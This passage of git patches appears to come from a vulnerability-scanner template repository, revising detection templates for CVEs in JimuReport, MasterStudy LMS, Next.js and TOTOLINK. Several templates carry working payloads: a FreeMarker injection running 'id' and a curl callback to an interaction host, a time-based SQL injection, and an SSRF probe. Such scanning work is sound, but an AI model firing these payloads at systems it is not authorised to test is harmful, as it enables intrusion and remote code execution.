b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-45269.yaml' + - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' From 84805386e81a302791d89c701968b441c07e9a8e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:30:29 +0000 Subject: [PATCH 1237/1841] Auto Template Signing [Mon Jul 15 05:30:29 UTC 2024] :robot: --- http/cnvd/2021/CNVD-2021-15824.yaml | 2 +- http/cves/2023/CVE-2023-29204.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index 31ef878ebb..6073a0e04d 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206ee0264e332ef668bc46fdd8cdb2496fc0fdfcb71334e500b11d0ed036dfba64022025f4bdb1a75b771cae2b246bd7d9d00ddcbd34ece08cd44b8e3698d89cd0062a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml index 42aef997f6..31623a826e 100644 --- a/http/cves/2023/CVE-2023-29204.yaml +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -42,3 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100a9e6f163f3f39c2b3b46524179d1705705a4934c4208c88d28b483f3b91dd690022040db666a1484eebbadd5cc2370e5b3d165703d7a1c2162ccc48f8d2a9fcda3dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0a806d3dc45298e7a3736aa58dd5551116c82588 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 11:09:48 +0530 Subject: [PATCH 1238/1841] minor update --- http/cves/2024/CVE-2024-34257.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-34257.yaml b/http/cves/2024/CVE-2024-34257.yaml index fdccdff669..16774241e6 100644 --- a/http/cves/2024/CVE-2024-34257.yaml +++ b/http/cves/2024/CVE-2024-34257.yaml @@ -7,12 +7,18 @@ info: description: | TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges. reference: - - https://example.com/reference - https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md - https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350 - - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/20142995/nuclei-templates + classification: + epss-score: 0.00043 + epss-percentile: 0.0926 metadata: + vendor: totolink + product: a3700r_firmware + shodan-query: http.title:"totolink" fofa-query: title="totolink" + google-query: intitle:"totolink" tags: cve,cve2024,rce,unauth variables: @@ -24,7 +30,7 @@ http: POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: {{Hostname}} Origin: {{RootURL}} - Referer: {{RootURL}}/page/index.html?timestamp=1714114057910 + Referer: {{RootURL}}/page/index.html { "token":"", @@ -35,7 +41,6 @@ http: GET /{{file}}.txt HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: word From eee54245edb907f9eda059498d407dc9c2793a73 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 11:17:56 +0530 Subject: [PATCH 1239/1841] minor update --- http/cves/2024/CVE-2024-1512.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index 63f6a87343..b5cba29ce8 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -12,7 +12,6 @@ info: - https://github.com/rat-c/CVE-2024-1512 - https://blog.csdn.net/m0_60571842/article/details/139901296 - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve - - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -21,7 +20,7 @@ info: epss-percentile: 0.09257 metadata: verified: true - max-request: 2 + max-request: 1 vendor: stylemixthemes product: masterstudy_lms framework: wordpress @@ -31,7 +30,7 @@ info: http: - raw: - | - @timeout 30s + @timeout 10s GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 Host: {{Hostname}} @@ -39,6 +38,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"items","total","total_price") && contains(header,"application/json")' + - 'contains_all(body,"items","total","total_price") + - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and From fbe7d54dd60fbc2424ef2c1c32906c107883dce9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 11:58:41 +0530 Subject: [PATCH 1240/1841] minor update --- http/cves/2023/CVE-2023-4450.yaml | 77 +++++++++++++++---------------- 1 file changed, 38 insertions(+), 39 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 1b4660f61c..aee11f7071 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -1,57 +1,56 @@ -id: 'CVE-2023-4450' +id: CVE-2023-4450 info: - name: 'JimuReport FreeMarker SSTI RCE (CVE-2023-4450)' - author: 'Sumanth Vankineni' + name: JeecgBoot JimuReport Template injection + author: Sumanth Vankineni severity: critical description: | - A vulnerability was found in jeecgboot JimuReport up to version 1.6.0. It has been declared as critical. Affected by this vulnerability is the Template Handler component. The vulnerability allows for server-side template injection (SSTI), leading to arbitrary code execution. The attack can be launched remotely. This exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 addresses this issue. It is recommended to upgrade the affected component. - - - NVD CVSS Score: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) - - VulDB CVSS Score: 6.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) - - References: - - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 - - https://whoopsunix.com/docs/java/named%20module/ - - VDB-237571 - tags: jimureport, ssti, rce, freemarker, cve-2023-4450 + A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. + impact: Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. + remediation: Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. + reference: + - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 + - https://whoopsunix.com/docs/java/named%20module/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-4450 + metadata: + verified: true + max-request: 1 + vendor: jeecg + product: jeecg + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" + google-query: intitle:"jeecg-boot" + tags: cve,cve2023,rce,jeecgboot -requests: +http: - method: POST path: - "{{BaseURL}}/jmreport/queryFieldBySql" headers: Content-Type: application/json - User-Agent: Nuclei + body: | { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" + "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"curl {{interactsh-url}}\")}'" } + matchers-condition: and matchers: - - type: regex - regex: - - "result: uid=[0-9]+\\(.*\\) gid=[0-9]+\\(.*\\) groups=[0-9]+\\(.*\\)" - part: body - - type: status - status: - - 200 - - method: POST - path: - - "{{BaseURL}}/jmreport/queryFieldBySql" - headers: - Content-Type: application/json - User-Agent: Nuclei - body: | - { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"ver\")}'" - } - matchers-condition: and - matchers: - - type: regex - regex: - - "result: .*Windows.*" - part: body + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "ListManagerWeb" + - type: status status: - 200 From e3ce693b080a1a2ef15ce252b916ba8acecb4b32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:05:16 +0530 Subject: [PATCH 1241/1841] Update CVE-2023-4450.yaml --- http/cves/2023/CVE-2023-4450.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index aee11f7071..9b0602f648 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -1,13 +1,15 @@ id: CVE-2023-4450 info: - name: JeecgBoot JimuReport Template injection + name: JeecgBoot JimuReport - Template injection author: Sumanth Vankineni severity: critical description: | - A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. - impact: Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. - remediation: Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. + A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. + impact: | + Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. + remediation: | + Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. reference: - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 - https://whoopsunix.com/docs/java/named%20module/ From 903e3a6dd9d17f6e1b632e3760eb212ec7820257 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:14:26 +0530 Subject: [PATCH 1242/1841] minor update --- http/cves/2023/CVE-2023-4450.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 9b0602f648..273bb151a1 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -38,20 +38,20 @@ http: body: | { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"curl {{interactsh-url}}\")}'" + "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" } matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" - type: word - part: header + part: content_type words: - - "ListManagerWeb" + - "application/json" - type: status status: From bd5fb153af62776cea2778105c0d42c8991bc0eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:41:32 +0530 Subject: [PATCH 1243/1841] minor update --- http/cves/2023/CVE-2023-4450.yaml | 39 +++++++++++++------------------ 1 file changed, 16 insertions(+), 23 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 273bb151a1..bd903ecbb7 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -30,29 +30,22 @@ info: tags: cve,cve2023,rce,jeecgboot http: - - method: POST - path: - - "{{BaseURL}}/jmreport/queryFieldBySql" - headers: - Content-Type: application/json + - raw: + - | + POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json - body: | - { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" - } + { + "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://{{interactsh-url}}\")} ", + "type": "0" + } - matchers-condition: and matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" - - - type: word - part: content_type - words: - - "application/json" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")' + - 'status_code == 200' + - 'contains(content_type,"application/json")' + - 'contains(body,"success")' + condition: and From aad138515449e3cfd1d7220ea1800e499d897b70 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:43:11 +0530 Subject: [PATCH 1244/1841] minor-update --- http/cves/2024/CVE-2024-1512.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index b5cba29ce8..5be76b06ec 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"items","total","total_price") + - 'contains_all(body,"items","total","total_price")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and From d23457d8801a8e3a0ac801ea349d9039e2063bf1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 08:36:08 +0000 Subject: [PATCH 1245/1841] Auto Generated New Template Addition List [Mon Jul 15 08:36:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5fc78c679e..dcbd671bea 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2023/CVE-2023-48728.yaml +http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml From 68ce4ca1bfd494689727192109fa48563d54193a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 08:36:27 +0000 Subject: [PATCH 1246/1841] Auto Generated Templates Checksum [Mon Jul 15 08:36:27 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 43c260e780..323947697d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -974,7 +974,7 @@ http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 -http/cnvd/2021/CNVD-2021-15824.yaml:f2c942015bfe6963cf4bc852a8ef223241838ddd +http/cnvd/2021/CNVD-2021-15824.yaml:ff1b26509369cd7c5faf50b125a4e909cbb789af http/cnvd/2021/CNVD-2021-17369.yaml:c6641a046b08f57aa90ed4aca983da8265404f8c http/cnvd/2021/CNVD-2021-26422.yaml:3e323f0417f5e29dde9543fbb5ecbfe4dbcc6303 http/cnvd/2021/CNVD-2021-28277.yaml:68aff5e8d0140815c4acfff946b3f46f69f184b2 @@ -3115,7 +3115,7 @@ http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a -http/cves/2023/CVE-2023-29204.yaml:c8e21ff3c03734685069d76093b69a2ae414d7a7 +http/cves/2023/CVE-2023-29204.yaml:4f9c361d223ff2788c57b39f5dce6b76a910fb31 http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 http/cves/2023/CVE-2023-29300.yaml:92d57be27eb447fc6bd0912c30df002d7407a300 http/cves/2023/CVE-2023-29357.yaml:0ab57ac3d6597a932b316bc1dfdb6dded4854294 @@ -3396,6 +3396,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f +http/cves/2024/CVE-2024-1512.yaml:a5e1b8a041561e640567b787b0095424891fe3c5 http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a @@ -8877,7 +8878,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e8c32bfa7093ffc5a2a4b1f2d90e7c99d6de8e47 +templates-checksum.txt:de2dca21800a028e9e567e3d63a3a1a9ad19bd59 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 559a48970b4bff8bf167dea27d6d8ee3ffda8c41 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 08:37:00 +0000 Subject: [PATCH 1247/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 58a67fbf9b..f4779767c5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' + - 'http/cves/2024/CVE-2024-1512.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From f81354cb2125a05aeb9ebea00a05da622ba28b94 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 08:37:59 +0000 Subject: [PATCH 1248/1841] Auto Template Signing [Mon Jul 15 08:37:59 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1512.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index 5be76b06ec..db78801456 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -42,3 +42,4 @@ http: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100c6dbdabebf3324ee1e4f9d45c2950a0ce5014cdfc534dea737e3a9ff0b443dbd022100a8d3ef776d11c757f11fa7ac51275fada26d7035c89eb55fe944b9a7f653843a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d4415866ae6aa55f2dadf2af3980d6b9ce93e09f Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 10:52:14 +0200 Subject: [PATCH 1249/1841] Add files via upload --- http/cves/2024/CVE-2024-34351.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34351.yaml diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml new file mode 100644 index 0000000000..b745941348 --- /dev/null +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -0,0 +1,28 @@ +id: CVE-2024-34351 + +info: + name: Next.js - SSRF + author: righettod + severity: high + remediation: Upgrade to Next.js version 14.1.1 or higher. + description: | + Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF. + reference: + - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps + - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 + - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + metadata: + max-request: 2 + tags: cve,cve2024,vercel,nextjs,ssrf + +http: + - method: GET + path: + - '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}' + - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' + + matchers: + - type: word + part: interactsh_protocol + words: + - 'http' From 167255cda90fcf490dc73b543117d572e3747c8a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 10:58:10 +0200 Subject: [PATCH 1250/1841] Remove extra spaces --- http/cves/2024/CVE-2024-34351.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b745941348..b2f5ef23bc 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -10,7 +10,7 @@ info: reference: - https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps - https://nvd.nist.gov/vuln/detail/CVE-2024-34351 - - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g + - https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g metadata: max-request: 2 tags: cve,cve2024,vercel,nextjs,ssrf From c8a20d1aae4d4b75bb55831686f6f01043f07b0e Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 15 Jul 2024 11:01:16 +0200 Subject: [PATCH 1251/1841] Fix linter error --- http/cves/2024/CVE-2024-34351.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-34351.yaml b/http/cves/2024/CVE-2024-34351.yaml index b2f5ef23bc..23bbe1b96a 100644 --- a/http/cves/2024/CVE-2024-34351.yaml +++ b/http/cves/2024/CVE-2024-34351.yaml @@ -22,7 +22,7 @@ http: - '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}' matchers: - - type: word - part: interactsh_protocol - words: - - 'http' + - type: word + part: interactsh_protocol + words: + - 'http' From 8a3ad71ea40b4fcc5ccd2f10fbbf697f8465d794 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 14:41:14 +0530 Subject: [PATCH 1252/1841] minorupdate --- adcs-detect.yaml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/adcs-detect.yaml b/adcs-detect.yaml index 4705dc4f92..f60a3d3b8c 100644 --- a/adcs-detect.yaml +++ b/adcs-detect.yaml @@ -1,10 +1,11 @@ id: adcs-detect info: - name: ADCS Detection + name: ADCS - Detect author: pastaga,defte severity: info - description: ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` + description: | + ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` tags: ad,adcs http: @@ -12,17 +13,16 @@ http: path: - "{{BaseURL}}/certenroll" - redirects: true matchers-condition: and matchers: + - type: word + part: header + words: + - "Location: {{BaseURL}}/certenroll/" + - type: status status: - 300 - 301 - 302 condition: or - - - type: word - words: - - "Location: {{BaseURL}}/certenroll/" - part: header From 135211d87338554b7951b3ebdc35aaddf042208c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 14:44:21 +0530 Subject: [PATCH 1253/1841] fix trail space --- adcs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/adcs-detect.yaml b/adcs-detect.yaml index f60a3d3b8c..c23078450b 100644 --- a/adcs-detect.yaml +++ b/adcs-detect.yaml @@ -4,7 +4,7 @@ info: name: ADCS - Detect author: pastaga,defte severity: info - description: | + description: | ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` tags: ad,adcs From 489eae8e9b0da269856a877e60c8a2b40bfa0a58 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 11:18:24 +0000 Subject: [PATCH 1254/1841] Auto Generated New Template Addition List [Mon Jul 15 11:18:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dcbd671bea..922d7f8f5c 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml +http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml From 666dba119751815ad8f1fbdb4e6c3c13df67a73f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 11:18:29 +0000 Subject: [PATCH 1255/1841] Auto Generated Templates Checksum [Mon Jul 15 11:18:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 323947697d..edb768bc9c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,6 +3293,7 @@ http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a http/cves/2023/CVE-2023-44352.yaml:aab520d12d287288efc9c45a67a0e196a444ff93 http/cves/2023/CVE-2023-44353.yaml:147dd7796888db15383a9db3b463b1c564bde8cf +http/cves/2023/CVE-2023-4450.yaml:44a7cf49f0f3248d174146ef6363d5d280737948 http/cves/2023/CVE-2023-4451.yaml:d5e665511b95b75eea8988c75f5427b4616e80c9 http/cves/2023/CVE-2023-44812.yaml:11e5628cb888352e0dcd50839df33dc85fb2b58c http/cves/2023/CVE-2023-44813.yaml:ba83815830ad498e3a1e78649d1ddc4a48612025 @@ -3396,7 +3397,7 @@ http/cves/2024/CVE-2024-1209.yaml:2951e4131bf7866fb91570a8d7d12ecd316a68da http/cves/2024/CVE-2024-1210.yaml:7af2bde109e8f0dbb0af5f22cdbcfd5e2c0cc132 http/cves/2024/CVE-2024-1212.yaml:6b1a4784714777f96940e0a8ee7a02b8f92922a4 http/cves/2024/CVE-2024-1380.yaml:20b25b6bb316198f59ab5b21284278df2eeb480f -http/cves/2024/CVE-2024-1512.yaml:a5e1b8a041561e640567b787b0095424891fe3c5 +http/cves/2024/CVE-2024-1512.yaml:aa9ecb446e1abbc03acec48e489c0a4aa5b3c053 http/cves/2024/CVE-2024-1561.yaml:c0921ab0f4b853a4556d2853856c4ce3dae6dd3b http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:fbffa10f3832defdae69499878e00010a44c1b0a @@ -8878,7 +8879,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:de2dca21800a028e9e567e3d63a3a1a9ad19bd59 +templates-checksum.txt:6541ef1d68f6051c35d1edb80eeeed45cc1bfdc0 